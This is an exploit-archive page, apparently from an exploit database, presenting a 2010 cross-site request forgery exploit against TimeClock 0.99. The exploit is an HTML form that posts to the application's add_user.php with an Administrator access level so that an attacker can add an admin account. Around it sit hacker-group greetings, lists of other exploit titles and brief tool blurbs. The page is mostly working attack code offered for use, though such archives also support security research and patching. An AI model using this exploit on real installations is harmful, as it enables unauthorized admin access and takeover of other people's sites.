Menu

Search for hundreds of thousands of exploits

"TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)"

Author

Exploit author

ViRuSMaN

Platform

Exploit platform

php

Release date

Exploit published date

2010-02-20

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] TimeClock Remote Add Admin Exploit
==============================================================================

    [»] Script:             [ TimeClock ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ timeclock-software is a free open-source application released under the GP. ]
    [»] Download:           [ http://www.hormiga.org/zonamac/descargas/timeclock-software.zip ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

<html>
<head>
<title>TimeClock Remote Add Admin Exploit[By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

<form method="post" action="http://localhost/scripts/add_user.php">
<table border="1">
<tr>
<td align="center"><b>Adding User</b></td>
</tr>
<tr>
<td>
<table>
<tr>
<td align="right">First Name:&nbsp;</td><td align="left"><input type="text" name="fname" size="30"></td>
</tr>
<tr>
<td align="right">Last Name:&nbsp;</td><td align="left"><input type="text" name="lname" size="30"></td>
</tr>
<tr>
<td align="right">Access Level:&nbsp;</td>
<td>
<select name="access_level">
<option value="Administrator">Administrator</option>
<option value="User">User</option>
</select>
</td>
</tr>
<tr>
<td align="right">Username:&nbsp;</td><td align="left"><input type="text" name="u_name" size="30"></td>
</tr>
<tr>
<td align="right">Password:&nbsp;</td><td align="left"><input type="text" name="user_password" size="30"></td>
</tr>
<tr>
<td>&nbsp;</td><td><input type="submit" name="submit" value="Add" class="button">&nbsp;<input type="submit" name="cancel" value="Cancel" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>

Author: ViRuSMaN <-

###########################################################################
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2010-02-26 "FileExecutive 1 - Multiple Vulnerabilities" webapps aix ViRuSMaN
2010-02-23 "QuickDev 4 PHP - Database Disclosure" webapps php ViRuSMaN
2010-02-22 "phpBugTracker 1.0.1 - File Disclosure" webapps php ViRuSMaN
2010-02-22 "vBSEO 3.1.0 - Local File Inclusion" webapps php ViRuSMaN
2010-02-20 "FlatFile Login System - Remote Password Disclosure" webapps php ViRuSMaN
2010-02-20 "Netzbrett - Database Disclosure" webapps php ViRuSMaN
2010-02-20 "TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)" webapps php ViRuSMaN
2010-02-13 "ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion" webapps php ViRuSMaN
2010-02-11 "myPHP Guestbook 2.0.4 - Database Backup Dump" webapps php ViRuSMaN
2010-02-09 "fipsForum 2.6 - Remote Database Disclosure" webapps asp ViRuSMaN
2010-02-09 "NewsLetter Tailor - Database Backup Dump" webapps php ViRuSMaN
2010-02-09 "NewsLetter Tailor - Authentication Bypass" webapps php ViRuSMaN
2010-01-23 "OpenDb 1.5.0.4 - Multiple Local File Inclusions" webapps php ViRuSMaN
2010-01-15 "Triburom - 'forum.php' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-14 "Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-14 "Xforum 1.4 - 'nbpageliste' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-13 "Tribisur - 'cat' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-10 "E-membres 1.0 - Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-10 "ABB 1.1 - Forum Remote Database Disclosure" webapps asp ViRuSMaN
2010-01-10 "DigitalHive - 'mt' Cross-Site Scripting" webapps php ViRuSMaN
2010-01-10 "Egreetings 1.0b - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-27 "Joomla! Component com_dhforum - SQL Injection" webapps php ViRuSMaN
2009-12-24 "Web Wiz NewsPad - Database Disclosure" webapps asp ViRuSMaN
2009-12-24 "Snitz Forums 2000 - Database Disclosure" webapps asp ViRuSMaN
2009-12-24 "Web Wiz Forums 9.64 - Database Disclosure" webapps asp ViRuSMaN
2009-12-19 "Toast Forums 1.8 - Database Disclosure" webapps asp ViRuSMaN
2009-12-16 "GuestBookPro Script - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-16 "Codefixer Membership - Remote Database Disclosure" webapps asp ViRuSMaN
2009-12-14 "Digital Hive - Multiple Vulnerabilities" webapps linux ViRuSMaN
2009-12-14 "myPHPupload 0.5.1 - Arbitrary File Upload" webapps linux ViRuSMaN
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.